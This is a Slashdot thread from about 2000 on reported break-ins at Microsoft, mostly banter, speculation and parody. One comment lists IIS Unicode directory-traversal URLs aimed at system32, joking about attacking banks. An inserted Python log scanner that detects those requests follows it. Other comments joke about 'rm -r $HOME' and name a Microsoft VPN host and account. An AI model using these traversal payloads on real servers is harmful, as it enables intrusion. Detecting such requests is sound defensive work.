Microsoft Cracked again?
Dominic writes: "Seems Microsoft have been hacked (possibly) again, according to infoworld."
They don't seem to have a lot of evidence, but there's some interesting commentary related to this, and the earlier crack where the source code to Windows and Office was supposedly stolen (I'll believe that when I see it).
Could Microsoft Ask for worse press/marketing? (Score:2)
Let me guess... A few days from now the story will be cleared up as a minor breach and that no data was modified nor seen...
Security (Score:1)
They also seem to have a complete disregard for the security of their products, allowing them to be made available in this way.
Perhaps Microsoft should actually think about the problems this caused for them, and the problems it could quite easily cause for others; the consequences are most severe.
Buck up your attitude?
Re:M$ Bashing. (Score:1)
Security profile and risk management (Score:1)
They are probably "cracked" on a regular basis, but because you don't hear about it, and so it remains a non-issue. As soon as a little event ends up in the news, this sort of silliness is the result. Hopefully, you'll understand why most companies, including banks, are extremely reluctant to share information with the law enforcement agencies. One simple little attack might take a company's value through the floor because investors don't understand the hoopla surrounding a security incident. You hear about bank holdups all the time, but you'll never hear about real incidents of electronic fraud or Internet banking attacks, even though they occur every day somewhere on the planet.
There are many companies that take a similar risk-managed approach to security. You classify assets based upon their worth to the organisation, and then you protect them to that value. Cracking into the machines that do "download.microsoft.com" is different to cracking into the corporate ERP system or the internal code repositories.
With over 10,000 attacks a week, Microsoft takes a reasonable approach to security, in my opinion. No one can be 100% secure, and it costs so much to be near 100% secure that it's not worth doing so. If you don't agree with me, bite me. Unlike most of you, risk managed security architecture is what I do for a living.
Re:Microsoft's Servers != Microsoft Windows (Score:1)
Re:Bill Gates... has a conscience? (Score:2)
Too often on here I see the ignoramus posting about the evils of Microsoft and Gates. I think it's the same thing as penis envy... he's rich, he's got an amazingly successful company... and you don't. I'm no fan of the software quality myself, but I won't go about spouting how the CEO is evil. That's just immature. I think Gates has proven himself a worthy human with all his donations. At least he's doing more than those other tech people who claim that computers can solve everything. You need to be able to eat decent food and clean water before you need a SystemTech PentiumProThlon 9000 w/ advanced graphics capabilities and Altec Lansing speakers. You need to solve starvation before planting a laptop in the hands of the poor.
Re:Bill Gates... has a conscience? (Score:1)
Well, by that standard then, nations like Cuba and Iraq ought to be paradises. The embargos keep us vicious foreign devils from looting them. So, why are they miserable pits of desperation and poverty?
As for rule of law, that's very vague. If you mean the laws that allow only US-owned businesses to import and export food while depriving native farmers of implements and supplies, then I'd have to say you're wrong. If you mean establishing a minimum standard of living for the populace, I'd say you're right.
No, I mean that you pass laws that permit people to keep the fruits of their labors and assure certain basic rights such as speech, assembly, voting, etc. and you make sure that you have a legal system that enforces those laws. Without corruption or cronyism.
Your response betrays your mindset that for a nation to succeed, it must obtain the means to do so from outside. I maintain that that simply isn't true. The reason the West prospers is a result of its freedoms, laws, and capitalism. For a good example of what happens when you lose that, you need look no farther than South Africa. Once the economic jewel of the continent, it's gradually descending into a chaos of tribalism and corruption. Unchecked, it will ultimately be as impoverished as its neighbors.
Re:M$ Bashing. (Score:1)
Of course if it was years ago, then most people would lower their guards and relax a bit because they needed a "wake-up-call".
And it cant be easy to be a favorite hacking object.
--------
That's nothing! (Score:2)
That's nothing. I downloaded it, changed some things, and uploaded the changes!
I even put my name in the files, so anyone else who downloads it will know I did it!
Re:Security profile and risk management (Score:2)
"...The[y] triage each attack and deal with those that actually form a real threat to the organisation..."
Even the most self-serving accounts of the previous crack says that the crackers were in for twelve days. M$ spun the story to say that they were watching the whole time; I don't believe that. Now *you* want us to believe that M$'s response team really focuses on attacks "...that actually form a real threat to the organization..."
Nuts. They flat didn't even know the first one was happening for 'way too long.
"...They also conduct internal tiger team attacks to ensure they know about the holes before attackers do..."
That's all real fine-and-dandy for the hard-core threats -- but every account I've read says that M$ was compromised by an email attachment that:
"Tiger teams"?
"Tiger teams" aren't going to do M$ any good; it's their own software and their own arrogance that did them in.
To let you continue:
"...Hopefully, you'll understand why most companies, including banks, are extremely reluctant to share information with the law enforcement agencies..."
No, I don't, particularly given your outlandish rationalization:
"...One simple little attack might take a company's value through the floor because investors don't understand the hoopla surrounding a security incident..."
"One simple little attack..."?
Hoopla?
That's what any shareholder concern boils down to? God forbid that a company's shares fall in price because they can't manage to implement a comprehensive security system.
And let's not worry the silly little investors about such trivia.
"Hey! They invested in our company. How smart can they be?"
t_t_b
--
I think not; therefore I ain't®
Your subject is your answer (Score:2)
Though, as Microsoft are often in the habit of eating their own dog food, they might be using their new Internet Security and Acceleration [ISA] Server, the replacement to shitty old Proxy Server. This eliminates much of the nastiness [and non-firewallness] of PS, and is about -3 months old. This incident would damage the launch severely if MS told anyone what they were using.
I'd suspect, with regards to security, they do the testing in a closed environment for quite some time.
But your point is nevertheless a good one - while we don't know what MS use internally, the habit of people calling Outlook Viruses `email viruses', when they only affect a specific client, is misleading.
Who cares? (Score:2)
Sorry- having an open mind is great so long as your brain doesn't fall out. I think you've been spun. The guy's still the primary personality behind the totally unacceptable behavior of Microsoft, which has been _convicted_ of monopolistic crimes, the list of which is so long it'll make your head spin. Did they just do this at random? No, there was a pattern of 'search and destroy' and open attack of the capitalistic process coming right from the top there.
If tossing a few nickels at charity can really make you forget that, you have a _short_ memory.
Re:Security (Score:1)
Re:Looking at the Source Code is Lethal! (Score:1)
Cracking Microsoft is a bad idea. (Score:5)
So mess with the customers of Microsoft as much as you want, embarrass them for the whole world, but leave Microsoft itself alone! There may come a time when it is desperately necessary to break into the Microsoft stronghold and *then* you want all those exploits wide open; not plugged.
oh sure... (Score:1)
b: look at my machine
g: wow, so much cables and so...
b: i am a superhacker. i already hacked pentagon and nearly sent nukes on russians
g: cool really? can you show something to me?
b: sure look now i login to internet
aolsoft: you've got mail
[click click] [ftp://billg:linuxsuxx@microsoft.com]
[rm -r $HOME]
b: now i hacked microsoft!
g: wow, you are my hero *kiss*
Re:Patches and Absolute Certainty (Score:2)
I know that you don't need the source code to find buffer overflows. I also know that of 1000 people who can find a buffer overflow by examining the source code, maybe 2 or 3 know how to use SoftICE or IDA to find the same exploit by working on the binary. So basically, although you are correct in that you don't need the source code, it makes it much more difficult for the average script kiddie to find it, and thus less likely that it will become public knowledge.
Red Flag (Score:1)
Smells terribly fishy to me.
"I don't want the cheese; I only want out of the trap."
Re:Cracking web sites (Score:3)
Bill Gates... has a conscience? (Score:2)
http://www.observer.co.uk/international/story/0,6
This single article reversed 180 degrees my opinion of Mr. Gates.
I previously believed him to be a greedy, naive, power-hungry egomaniac. If this article is accurate, and he will be giving away his money for food and medicine instead of for computers (which are pretty useless if you don't have anything to eat) then maybe slashdot should look into not portraying him as such an evil person. Maybe he has finally matured?
(I know this goes completely against the conventional wisdom on Slashdot, but read the article, maybe submit it as a story here... show that even geeks can be open-minded)
Open Source, Closed Minds. We are Slashdot.
Hmmmm (Score:3)
A
Open Office (Score:1)
Office source code was stolen? Yeah, sure!
Moderator - clue stick! (Score:2)
The moderator who modded the above post as "Troll" must be whacked with a cluestick, please!
Quidquid latine dictum sit, altum viditur.
Re:Bill Gates... has a conscience? (Score:1)
Re:Bill Gates... has a conscience? (Score:2)
After all, if he realized just how bad things truly were, & how much he could have done to prevent those bad things, he'd also see that they were nothing more than a band of toadies & parasites, & be out on the street without stock options or job prospects.
I just had a flashback to the old stories of Siddhartha Gautama, who was shielded from death and decay by his royal advisors and parents. One day, upon seeing a sick man, a crippled man, a dead man, and a religious man, he realized how the world really was, and fled to live a religious life.
Wow, I just compared Bill Gates to Buddha. I suddenly feel the need to go wash.
Re:M$ is lucky (Score:1)
Hoax (Score:2)
Bill went home and started calling every Charlie on the phone book to hire angels.
Re:Open Office (Score:1)
The feedback we have gotten from the millions of people who say they are using LINUX has all been positive. Two surprising things are apparent, however, 1) Most of these "users" never bought LINUX (less than 10% of all PC owners have bought LINUX), and 2) The amount of royalties we have received from sales to hobbyists makes the time spent on LINUX worth less than $2 an hour.
Why is this? As the majority of linux users must be aware, most of you steal your software. Hardware must be paid for, but software is something to share. Who cares if the people who worked on it get paid?
Is this fair? One thing you don't do by stealing software is get back at Linus or Alan for some problem you may have had. RedHat doesn't make money selling software. The royalty paid to us, the manual, the tape and the overhead make it a break-even operation. One thing you do do is prevent good software from being written. Who can afford to do professional work for nothing? What hobbyist can put 3-man years into programming, finding all bugs, documenting his product and distribute for free? The fact is, no one besides us has invested a lot of money in hobby software. We have written Emacs, and are writing kernel 2.4, but there is very little incentive to make this software available to hobbyists. Most directly, the thing you do is theft.
Re:Cracking Microsoft is a bad idea. (Score:1)
Re:Bill Gates... has a conscience? (Score:1)
l0phtcrack (Score:2)
Shouldn't l0phtcrack be just as "illegal" regarding Microsoft SAM encrypted password files as DeCSS is to DVDs?
Must have taken lessons from Nvidia (Score:1)
Yhcrana
Patches and Absolute Certainty (Score:4)
This statement is particularly disheartening. When the problems with Microsoft Outlook Express and the "features" that allow viruses to spread have their only fix with these Patches, and that -- according to even Microsoft -- it's hard to make sure that the patches are applied completely: we should worry.
One might say that the little Microsoft Accessories should have been coded correctly the first time (before being published) but that is often a very hard thing to do.
I am asking You All: What ways could we make sure that "patches" had been applied across the board?
Re:Bill Gates... has a conscience? (Score:1)
Cracking web sites (Score:2)
Re:Hmmmm (Score:1)
It was supposed to be funny.
ummm.... (Score:2)
to no good....Hacked twice in a couple of weeks?
Reformat it make make open source! (Score:1)
One can easily see that this code no longer belongs to Microsoft since it's "rewritten from scratch"!
there will be a break-in before every new release (Score:3)
________
Re:Bill Gates... has a conscience? (Score:1)
Re:Red Flag (Score:1)
Erm... (Score:1)
Re:Hmmmm (Score:2)
What would he do, upload back to the MS ftp server? Maybe burn it to a disk and mail it to them?
Re:Bill Gates... has a conscience? (Score:1)
It's an improvement, at least. And he's right -- a lot of people would be helped more by basics like immunizations than, oh, Pocket PCs or e-mail.
The NYT almanac puts the life expectancy for those born in '94 in Rwanda at 23; Sierra Leone and Mozambique at 34; Liberia at 39, and so forth. These people have more immediate concerns, like war, famine, pestilence and plague, that should take precedence over hypertext. Funding something like immunizations (which his Foundation does), or, say, GM grains engineered for high yield (dunno if it does), would help a bit more...
Re:Patches and Absolute Certainty (Score:3)
Tivoli for Linux (yes, it exists). [tivoli.com]
The Red Hat Update Agent (up2date) (when it works).
A clueful admin.
A clueful CIO.
---
Re:M$ is lucky (Score:1)
ETRN x
eBay was running MS (Score:1)
Re:Don't get too proud (Score:2)
--
You think thats it!? (Score:1)
I would still like to see a Borland compiler, being able to download a newer RealPlayer for Linux and being able to feel safe of Peter Norton's Apps. It's not just about being able to see Director in Linux... Flash would be nice. =)
Re:Bill Gates... has a conscience? (Score:1)
we already destroy more food than we can eat
food prices are kept artificially high to "stabilize economies"
GM crops lock farmers into buying seed grain rather than growing their own and also lock them into pesticide / herbicide models
thus raping Africa once more
Re:Big deal (Score:1)
If you h4x0r3d it, could you please post the 2.4 source code?
We've been waiting for it for soooo long...
</TROLL>
____________________
Re:hacked twice (Score:2)
RT - Russian Technology
--
Well... (Score:1)
But the second bit... well, that's the attitude I sometimes see reading slashdot. I can see how it would be easy for media "outsiders" to make that assumption.
-J
Re:You better not see it... (Score:1)
Now that's scary. I won't object to termination of the license agreement, but sending a death squad to the user who peeked into M$ code seems to me a bit like over-reaction...
Re:Could Microsoft Ask for worse press/marketing? (Score:1)
already happened [infoworld.com].
Re:MS Servers (Score:1)
> even though the patches are developed and tested in the same building
.. You forgot to mention the bugs, which are also developed in the same building...
Re:Patches and Absolute Certainty (Score:1)
You could always add them to the payload of an email virus ;)
Re:Which server (Score:4)
And yes, the exploit was nearly identical to one of the lines you mentioned above.
(The IDG reporter said I couldn't share the log, sorry. Though it's possible that restriction might be gone now that the story has been published. The Infoworld story is a reprint of the IDG story that broke on Friday. Strangely enough, I didn't actually say the first sentence attributed to me in the article.)
h0ax (Score:2)
How high-priority is it? (Score:2)
--
Re:Anyone running anything... (Score:1)
Is it basically because not enough people design software to be secure? Or because people tend to add new features without considering the security ramifications?
Still, I don't see why being hacked is inevitable; at some point, software can be designed so that circumvention involves breaking underlying assumptions which must be true in order for your system to run at all. i.e. any crack would instantly disable your system, leaving it secure.
As a sysadmin, you can't know every single line of every program that's on your system, but isn't this the point of OpenSource: that some people will be intelligent enough to design secure software, and that others can fix what little glitches they miss?
You seem too pessimistic.
You better not see it... (Score:5)
Unfortunately, pursuant to subparagraph J of section 3, chapter 13 of the Microsoft end-user license agreement (EULA), Microsoft reserves the right to terminate any user who comes in contact with the Windows source code.
If you do receive the code via email or any other means, you are required to unplug your computer, telephone, and television, close your eyes, cover your ears, and chant "la la la, I can't hear you". Failure to comply with these provisions that protect our intellectual property is a violation of the DMCA, and will result in the MS Death-Commando(tm) being dispatched to your location.
We reserve the right to take legal action against anyone who has seen the aforementioned code, anyone who assisted in the theft of the code, anyone who made funny remarks about our IP protection measures, and anyone who found said illegal statements humorous. Stop laughing, we mean it.
Re:Patches and Absolute Certainty (Score:2)
If you want to wait until someone gets cracked before a hole is patched in your security, go ahead - I'll use open source, thanks.
Re:ummm.... (Score:4)
Monday November 27, 9:00 am Eastern Time
Press Release
Microsoft Eliminates Security Problems related to Linux 'Hacker OS'
Redmond, Wa--(BUSINESS WIRE)--Nov. 27, 2000--Microsoft Corp. (Nasdaq NMS: MSFT) today announced that it has discovered the reasons behind the recent web break-ins that have plagued them, and since eliminated them.
"We have been working for the past month performing an audit of all of our systems that could have been the source of the leak. We found that one of our corporate file servers had been replaced with one of those Linux boxes running Samba. Someone in our intranet development team thought that it would be a good way to keep his budget in line. Well, he knows better now, introducing an insecure free 'operating system' like that in our network - it's a career limiting move." stated Phil Todd, PR spokesperson for Microsoft.
Phil goes on to describe how a malicious hacker was able to remotely cause the source code in the Linux Computer to send him the Confidential Windows Source Code (tm). Linux 'Kernel Hackers' as they call themselves often do this kind of modification in order to make corporate firewalls useless. "You just never know what is in those free systems. There's nobody you can sue if things go wrong!" Phil added incredulously.
Microsoft has since removed the offensive machine and replaced it with a Real Windows 2000 File Server. "Sure, some people say it's slower this way, but they're just misinformed. At least it's SECURE."
About Microsoft
Founded in 1975, Microsoft (Nasdaq ``MSFT'') is the worldwide leader in software for personal computers and business computing. The company offers a wide range of products and services designed to empower people through great software -- any time, any place and on any device. Microsoft is a registered trademark of Microsoft Corp. in the United States and/or other countries. Other product and company names herein may be trademarks of their respective owners.
Re:Bill Gates... has a conscience? (Score:1)
But computers could be very useful helping the Third World solve its problems: computers can take much better advantage of limited bandwidth, they are better suited to store-and-forward or intermittent communications, and they can greatly simplify administrative processes and reduce costs. In health care and ecology alone, being able to track diseases and other events reliably is very important.
Of course, for that to work, you need low end, low-cost, reliable, and simple computers, open and stable standards, and free software. Third world countries can gain tremendously from computers, but they won't be able to do so if they spend money as wastefully on frills and upgrades as US corporations seem to be all too willing to do.
Re:Anyone running anything... (Score:2)
--Remove SPAM from my address to mail me
Re:I'm half convinced this whole business is a sha (Score:2)
Shhhhh.... WHAT was that?!? (Score:2)
Microsoft has ties with several people in the government. Good ties. Friendships, so to speak. All of these recent hacker attempts seem a little fishy to me. Why all of the publicity, all of a sudden? Why the big stink?
The USA government wants to pass even more restrictive internet and computer laws... laws which will be passed in the name of security, yet at the same time, killing our necessary personal freedoms - our rights.
Bush and Bill are buddy buddy. Microsoft will hold out on seeing the Supreme Court until Bush has become prez and has appointed new Justices. Microsoft will get a slap on the wrist. Our government will then apply god awful amounts of regulation to the computer industry...
So, yes I am being paranoid, but it all seems so obvious to me. Let's just hope that I am wrong, and next year, I am NOT saying "I told you so."
Re:I'm half convinced this whole business is a sha (Score:2)
Try reading my
Re:h0ax (Score:2)
Poor Microsoft (Score:2)
I'm half convinced this whole business is a sham (Score:2)
Expect to see legal roadblocks in the future for wine.
Lee
UCITA (Score:2)
Now that would be scary.
I bet the politicians behind UCITA didn't think of that.
Microsoft's Servers != Microsoft Windows (Score:5)
-------
Not True (Score:2)
Microsoft's internal network is made up of many separate domains (and Active Directory forests). The Houston domain is used exclusively for Microsoft's online properties (MSN.com, Microsoft.com, etc...) and has no privileges to Microsoft's primary domain, REDMOND.
BTW: You can PPTP into Microsoft at cxn-redmond.microsoft.com. (However, they took it down recently because of these security problems.) Username: REDMOND\billg; Password: ????
Re:Bill Gates... has a conscience? (Score:2)
> his money for food and medicine instead of for computers (which are pretty useless if you don't have anything to eat) then maybe
> slashdot should look into not portraying his as such an evil person. Maybe he has finally matured?
For the last couple of years (perhaps under the influence of his wife Melinda, perhaps not), Gates has been throwing money at various philanthropic targets. We're talking serious stuff like money to help homeless youth in the US Northwest, or to fund school programs in low-income school districts.
Does this mean he has gained a conscience? No, he's always demonstrated signs that his political views are left of center; it's something of a hold-over from growing up in Seattle. I'd say his own political views are best described as a ``limousine liberal." He is eager to throw money at ``good" causes, but has never thought about how much money he made by causing problems that need to be addressed by those ``good" causes. He is eager to give millions to provide drugs for Africa, but does not understand that Africa does not have the money to buy computer software at $50-- a pop. (MS Office being extra.)
Have no fear: Billg is still the ``greedy, naive power-hungry egomaniac" we all know & love. And he's got a ring of folks around him who will do their utmost to keep him that way. They check his computer daily to make sure he'll never see a BSOD, & assure him that he is the genius he thinks he is.
After all, if he realized just how bad things truly were, & how much he could have done to prevent those bad things, he'd also see that they were nothing more than a band of toadies & parasites, & be out on the street without stock options or job prospects.
Geoff
In other news... (Score:5)
President Clinton could not be reached for comment, but Governor and Presidential candidate George W. Bush said "that's the way the cookie jar crumbles." No, we don't know what he was talking about either.
Jeff
Re:*yawn* troll (Score:2)
MS has no incentive in the marketplace to improve their software. Maybe bringing it home to them, by showing them how bad their security is, will force them to make a better product. I doubt it though.
I worked in a bike shop for a few years. One man kept bringing in his bike to repair flats. He had about ten patches on his tires. It would have been cheaper to buy a heavy-duty inner tube and thorn scrapers, than to have it repaired over and over again, but he kept that leaky old inner tube.
Re:I'm half convinced this whole business is a sha (Score:2)
I don't know about you, but I really don't care whether my word processor is freeware or commercial. I want the underlying operating system to be free, or at least have all its specs published in full. Linux is great not so much because it is free of charge, but because there aren't any secrets about it. With windows there are lots of secrets. With the MacOS there are even more. But with Linux everything is right there on the table and its got a complete development environment included to boot! Talk about a hackers (!cracker) dream come true!
In short, the open source/free software model is one that works in some areas. It does not work for all. Therefore it is not going to take over the world. Twenty years from now commercial software will be just as prevalent as it is right now, if not more prevalent. There is every chance that free software might not be successful in the long run. There is also every chance that it will be successful. But there is nearly zero chance that it will overtake every other development model.
I personally think wine is the greatest thing since Linux itself. Imagine a terminal server type system based off wine? M$'s own terminal server is severely limited by the poor multi-user performance of NT. Unlike Linux and virtually any other version of Unix, it is very easy for a single user to eat up all the resources and lock out everyone else. This is a serious problem, but one that wine does not share. It wouldn't be too hard to make wine into one kick ass terminal server.
I'm looking forward to bigger and better things from wine.
Lee
eBay runs IIS :-( (Score:2)
The reason is that they find it easier to do rapid application development on the Windows machines. So in theory they can keep their back-end solid via Unix while having the development tools on an easily mastered platform.
Personally, I think running the whole thing on Solaris would have been easier, but that is/was their rationale.
D
----
Re:Microsoft's Servers != Microsoft Windows (Score:2)
D
----
Re:Bill Gates... has a conscience? (Score:2)
Turn off your computer, go outside, take a long pleasant walk, contemplate, and don't log back in till you realise there is more to the world than 1's and 0's.
Third world countries need food, water, shelter and peace NOT computers. Regardless, this is getting way off topic; I would really like to see that article posted in its own thread. Would be interesting to see if the /. crowd is as open minded as it thinks it is.
Don't get too proud (Score:3)
In the past, I had to keep up on patching default Mandrake Linux 7.0 installs just to make sure that I didn't get owned by a wu-ftpd site-exec kiddie. Installing any OS requires keeping on top of things when you admin a server(s)... Micro$~1 makes sure that you have more to do to keep your servers "secure"
First thing I do after installing any OS is find any security info I can and apply the related fixes.
Re:Bill Gates... has a conscience? (Score:2)
Re:Cracking web sites (Score:2)
Besides that, the highest profile Linux sites aren't anywhere near as popular or hated as Microsoft's sites. If Linux made more enemies, I'm sure we'd see more concerted efforts to break it. Of course we'd get patches within hours, days or weeks of each exploit. But the point is, because Microsoft is almost so universally disliked by hackers, they go out of their way breaking Microsoft's products, rather than expend that same effort on free software.
Re:You better not see it... (Score:2)
* Termination.
Without prejudice to any other rights, Microsoft may terminate this EULA if you fail to comply with the terms and conditions of this EULA. In such event, you must destroy all copies of the SOFTWARE PRODUCT and all of its component parts.
Sounds fun. [aol.com]
--
The real impact of this (Score:2)
Which server (Score:5)
He was not a "hacker" he just created one of the unicode urls that got parsed incorrectly by IIS. No skill.
http://target/scripts/..%c1%1c../winnt/system32
http://target/scripts/..%c0%9v../winnt/system32
http://target/scripts/..%c0%af../winnt/system32
http://target/scripts/..%c0%qf../winnt/system32
http://target/scripts/..%c1%8s../winnt/system32
http://target/scripts/..%c1%9c../winnt/system32
http://target/scripts/..%c1%pc../winnt/system32
Ok, now kids, don't go owning any banks running IIS today (Most are not patched)!
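Added here as a defender's check on the request pattern quoted above; it is not code from the thread or from Microsoft. The bug the poster describes is that IIS looked for ".." before decoding the path, while its UTF-8 decoder accepted overlong two-byte forms such as %c0%af (an illegal spelling of "/") and %c1%9c (of "\"). The script below percent-decodes each logged path, decodes it the permissive way, and flags requests that climb above the web root or that carry the 0xC0/0xC1 lead bytes, which never occur in valid UTF-8. The log format, field order and addresses are constructed.

```python
"""Flag IIS Unicode directory-traversal requests in web-server logs.

Detection idea: percent-decode the request path, decode it as leniently
as a buggy decoder would, normalise the path, and alert when the result
escapes the web root or used overlong UTF-8 lead bytes (0xC0/0xC1).
"""
from urllib.parse import unquote_to_bytes

# Constructed W3C-extended-style log lines (assumed field order, not a real log).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-11-27 09:00:01 10.0.0.5 GET /default.htm - 200
2000-11-27 09:00:02 10.0.0.9 GET /scripts/..%c0%af../winnt/system32 - 200
2000-11-27 09:00:03 10.0.0.9 GET /scripts/..%c1%9c../winnt/system32 - 200
2000-11-27 09:00:04 10.0.0.7 GET /caf%c3%a9.htm - 200
2000-11-27 09:00:05 10.0.0.9 GET /scripts/..%c0%qf../winnt/system32 - 404
"""


def lenient_decode(raw: bytes) -> str:
    """Decode like a permissive decoder: ASCII passes through, any two-byte
    form (including the overlong 0xC0/0xC1 ones) is combined into a code
    point, and every other non-ASCII byte becomes U+FFFD. Only called after
    strict UTF-8 decoding has failed, so well-formed paths never come here."""
    out = []
    i = 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            # 110xxxxx 10yyyyyy -> xxxxxyyyyyy; for 0xC0 0xAF this yields '/'
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def escapes_root(path: str) -> bool:
    """True if the decoded path climbs above the web root via '..' segments.
    Backslashes count as separators because Windows/IIS treat them that way."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def analyze_request(uri_stem: str) -> dict:
    """Percent-decode a request path and report traversal / overlong-UTF-8 findings."""
    raw = unquote_to_bytes(uri_stem)
    try:
        decoded = raw.decode("utf-8")   # well-formed UTF-8: decode strictly
    except UnicodeDecodeError:
        decoded = lenient_decode(raw)   # malformed: mimic the permissive decoder
    return {
        "decoded": decoded,
        "overlong_utf8": any(b in (0xC0, 0xC1) for b in raw),
        "traversal": escapes_root(decoded),
    }


def scan_log(text: str) -> list:
    """Return (client_ip, uri_stem, findings) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        ip, stem = fields[2], fields[4]
        findings = analyze_request(stem)
        if findings["overlong_utf8"] or findings["traversal"]:
            hits.append((ip, stem, findings))
    return hits


if __name__ == "__main__":
    for ip, stem, findings in scan_log(SAMPLE_LOG):
        print(ip, stem, "->", findings["decoded"], findings["traversal"])
```

The mangled variants in the post (e.g. %c0%qf) still trip the check because the 0xC0 lead byte survives percent-decoding even when the traversal no longer resolves.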
MS Windows - a toy Operating System (Score:3)
Re:Anyone running anything... (Score:2)
That's not quite true, though. One additional, and very important, thing that you can do is to try to figure out how to minimize the damage that an attacker can do even if he does manage to crack something. This is an area in which Unix/Linux and NT both fall down pretty badly; they spend a lot of time trying to make it hard to get privilege, but let you do pretty much anything you want if you do. There needs to be a lot more attention paid to making systems damage tolerant, so that a broken ftpd (or whatever) won't put the whole system at risk.
Re:Bill Gates... has a conscience? (Score:2)
BillG has made most of his money from ripping off large, wealthy Western companies and large, wealthy Westerners. While ripping people off is always unethical, the cynical side of me says that if a large proportion of Bill Gates' wealth earned, by and large, from rich people, ends up going to people who really need it, that goes some way to squaring the ledger :)
Guess I'm not an 31337 h4x0r after all. (Score:3)
The first thing I tried was the cmd.exe
Then I pcanywhered in and decided to see if I remote launched notepad if it would appear on the display. When notepad.exe was launched, the whole system crumbled. I tried to kill it, but it won't die. Task Manager just says "Access Denied". Geez, where's kill -9 when you need it. I'm even logged in as admin. I can't kill the process, and I can't start anything except task manager. Can't even launch the services panel to kill IIS.
So now I'm attempting the tried and true method of fixing a win box.
Anyone running anything... (Score:2)
Connect your computer to the internet. Allow it to accept any connection of any sort, ever, from anyone.
Congratulations. You're now at risk of being cracked.
All you can do now is neurotically, obsessively, try to think of every situation in which this cracking could happen, and try and cover it. Then ask all your friends, enemies, and family pets to tell you what you missed.
You're still going to get cracked one day, if enough people try, and enough people care. System administration is more about making this cracking difficult to the point of it not being worth it, rather than ruling it out altogether.
--Remove SPAM from my address to mail me
Script-kiddies and car-thieves (Score:4)
You are assuming script-kiddies need the source code to find out vulnerabilities in software, but the truth is, if they were able to understand the design intricacies of software they would not be script-kiddies.
Believe me, for those of us who are competent enough to choose between building or destroying, it's much more rewarding to be creative.
Re:Patches and Absolute Certainty (Score:2)
On the other hand, you don't need to pinpoint a weakness in the source code to break software; you just overload it and see how it reacts. A chain is as weak as its weakest link: pull it with enough force and it will break.
Determining the exact point of the failure is a work for the programmers who wrote the code, the crackers don't need to do that.
M$ Bashing. (Score:3)
Now for mine. A company that size with so many users depending on them has a huge responsibility in keeping this from happening. When it happened the first time, they should have had the resources to make sure that it doesn't happen again. Don't tell me they can't divert the manpower needed to solve this. Let's see the list of posts grow as usual; can we go past 500?
[extreme bashing on]If they can't secure their own network based on their own products, who can?[extreme bashing off]. Ah, felt good.
But somehow I doubt that it will affect anyone's decision about running their software. No impact at boss level, I'm afraid.
--------
Big deal (Score:4)
MS Servers (Score:5)
1) MS server software is, out of the box, full of security holes and downright dangerous to put on the Net without extensively patching them first, and
2) Patching them won't even help you, because there are too many patches and too many holes. So many, in fact, that even MS can't keep up with them, even though the patches are developed and tested in the same building.
Did I miss anything?
Re:Bill Gates... has a conscience? (Score:2)
Naw, just remember the old Zen koan:
``If you meet the Buddha on the road, KILL HIM!"
(Note to the humor impaired & windows-lovers out there: yes, I *am* making a joke.)
Geoff
Re:Look a little closer to home than that (Score:2)
Err, I don't think that my words implied that Billg was an example of ``unadulterated altruism". If being a limousine liberal was identical to pure unadulterated altruism, then we'd be giving Sally Struthers, spokeswoman for the ``Save the Children" foundation the Nobel Peace Prize, rather than Mother Teresa.
Then again, even if ``a lot of the donating that he does comes with the proviso that his name is loudly involved, I'll admit for sake of fairness that it's more than some of his peers are doing. Will we ever see the ``Larry Ellison Home for Battered Women"? Or even an ``Andrew Grove Foundation for Judaic Studies"?
So far, all I've seen created is Paul Allen's temple to Jimi Hendrix, & I'm still not convinced that even that is a good thing.
Geoff